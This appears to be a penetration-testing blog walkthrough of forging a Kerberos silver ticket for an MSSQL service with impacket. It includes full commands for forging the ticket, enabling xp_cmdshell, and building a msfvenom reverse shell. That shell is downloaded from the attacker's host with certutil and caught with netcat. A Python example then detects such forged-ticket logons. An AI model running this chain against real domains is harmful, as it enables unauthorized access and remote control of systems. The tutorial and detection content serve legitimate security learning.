Silver Ticket in Active Directory

To make it simple: Silver tickets are forged Service tickets. Service tickets are the tickets that let users access services, and by services I mean LDAP, HTTP, WSMAN, MSSQL, etc. To forge a silver ticket, we need the hash of the Service account and that’s it. With this “silver ticket” we can potentially pivot to other machines in the Domain.

Well, if we have the hash, why not just log in with the password or try pass-the-hash and be on our way? The reason is that if the Service account changes its password, the hash changes too, but the ticket will still be valid.

There are also other reasons why we might want to use Silver Tickets. Let’s take MSSQLSvc as an example: SQL Server has security measures to prevent unauthorized machines from logging in, but if we use a ticket, we’ll be able to bypass the Integrated authentication process. In this post, I’ll be showing you how we can create a silver ticket for the MSSQLSvc service.


Demo

Before we start, we need to configure our /etc/hosts file on Kali. The reason we do this is that a lot of remote pentesting tools, especially Kerberos-aware ones, expect to address hosts by their Domain name (the name that appears in the SPN) rather than by IP.

After that, we need to obtain the required information (NTLM hash of MSSQLSvc and Domain SID). There are multiple ways to get the Service Account hash remotely. A common way is via Kerberoasting and lucky for you, I’ve written a blog about it!

Once the Kerberoasted hash is cracked, we’ll have a clear-text password. We can convert it to an NTLM hash using the command below:

iconv -f ASCII -t UTF-16LE <(printf "CJ&Eric") | openssl dgst -md4

Here, “CJ&Eric” is the clear-text password.

Now, to get the Domain SID we can use a tool called lookupsid. As with remote Kerberoasting, we need a Domain User’s credentials to get the SID. For this scenario, let’s assume that we have the password for the J.Williams user.

impacket-lookupsid <Domain_Name>/<username_of_user>@<DC_IP>

After we have the required information, we can use Ticketer to create the ticket. The final argument (Administrator) is the user the forged ticket will claim to be.

impacket-ticketer -nthash <NTLM_Hash_Service> -domain-sid <Domain_SID> -domain <Domain_Name> -spn MSSQLSvc/<Full_Computer_Name> Administrator

Then, we need to point the KRB5CCNAME environment variable at that ticket.

export KRB5CCNAME=/home/activepwn/Administrator.ccache

Now, we can use mssqlclient.py to log into the SQL Server.

mssqlclient.py CLIENT1.WANDA.local -k

I’ll also show you how we can get a shell from mssqlclient.

We can enable xp_cmdshell and execute commands on the Windows machine.

enable_xp_cmdshell
xp_cmdshell "whoami"

Note: You need Administrator privileges to execute “enable_xp_cmdshell”. We have Administrator privileges because of the silver ticket.

We can use xp_cmdshell to copy a reverse shell over and execute it. First, let’s create the reverse shell.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.5.7 LPORT=53 --platform Windows -f exe > reverse.exe

Now let’s use certutil.exe to download it.

xp_cmdshell "certutil.exe -urlcache -f http://<Kali_IP>/reverse.exe C:\Windows\Temp\reverse.exe"

Before we execute it, let’s set up a netcat listener.

nc -lnvp 53

Execute it!

xp_cmdshell "C:\Windows\Temp\reverse.exe"

Back on our netcat listener, we get a shell! When we check who we’re running as, we can see that it’s ms-sql, but we have the privileges of an Administrator.
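From the defender’s side, the distinguishing property of what just happened is that the ticket was never requested from the KDC: the service host (CLIENT1) records a Kerberos network logon as Administrator (event 4624, logon type 3), while no Domain Controller ever logged a service-ticket request (event 4769) for that user against that service account. The following is an added example, not code from the original post, that correlates the two sources over a constructed, simplified event set. The field names and the host-to-service-account mapping are assumptions for the example; in real 4769 events the Service Name is the account that owns the SPN (a service account or the computer account), and a host’s 4624s legitimately follow tickets issued hours earlier, so the check tolerates a full ticket lifetime rather than looking for an immediate pair.

```python
"""Flag Kerberos logons on a service host that no DC ever issued a service ticket for.

Added example with constructed events; not part of the original post and not a real log schema.
"""
from datetime import datetime, timedelta

# Assumed inventory: which hosts are DCs, and which account owns the SPN served on each host.
DC_HOSTS = {"DC01"}
SERVICE_ACCOUNT_OF = {"CLIENT1": "svc_mssql"}

# Default Kerberos service-ticket lifetime; a legitimate 4624 may trail its 4769 by this much.
TICKET_LIFETIME = timedelta(hours=10)

# Constructed events. 4769 = service ticket issued (DC side); 4624 = logon accepted (host side).
EVENTS = [
    {"ts": "2024-01-01T09:00:00", "host": "DC01", "id": 4769, "user": "J.Williams", "service": "svc_mssql"},
    {"ts": "2024-01-01T09:00:05", "host": "CLIENT1", "id": 4624, "user": "J.Williams", "logon_type": 3, "auth": "Kerberos"},
    # Forged ticket presented straight to the service: host accepts it, DC never saw a request.
    {"ts": "2024-01-01T11:30:00", "host": "CLIENT1", "id": 4624, "user": "Administrator", "logon_type": 3, "auth": "Kerberos"},
]


def _ts(e: dict) -> datetime:
    return datetime.fromisoformat(e["ts"])


def unissued_kerberos_logons(events, service_account_of=SERVICE_ACCOUNT_OF,
                             dc_hosts=DC_HOSTS, lifetime=TICKET_LIFETIME):
    """Return (host, user, ts) for Kerberos network logons with no matching DC-side 4769.

    A 4769 matches if it is for the same user and the service account of that host, and was
    logged within `lifetime` before the logon.
    """
    issued = [(_ts(e), e["user"], e["service"])
              for e in events if e["id"] == 4769 and e["host"] in dc_hosts]
    flagged = []
    for e in events:
        if e["id"] != 4624 or e.get("auth") != "Kerberos" or e.get("logon_type") != 3:
            continue
        svc = service_account_of.get(e["host"])
        if svc is None:  # host not in our inventory; nothing to correlate against
            continue
        t = _ts(e)
        backed_by_kdc = any(
            u == e["user"] and s == svc and t - lifetime <= it <= t
            for it, u, s in issued
        )
        if not backed_by_kdc:
            flagged.append((e["host"], e["user"], e["ts"]))
    return flagged


if __name__ == "__main__":
    for host, user, ts in unissued_kerberos_logons(EVENTS):
        print(f"{ts} {host}: Kerberos logon as {user} with no service ticket issued by any DC")
```

In production the DC side must include every DC (tickets can be issued by any of them), clock skew needs a small tolerance on the window, and the mapping has to cover SPNs registered on computer accounts as well as on service accounts, otherwise every machine-account SPN logon will be flagged.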

This is just one example of how we can use a silver ticket. If you want more examples, check this out: Silver Tickets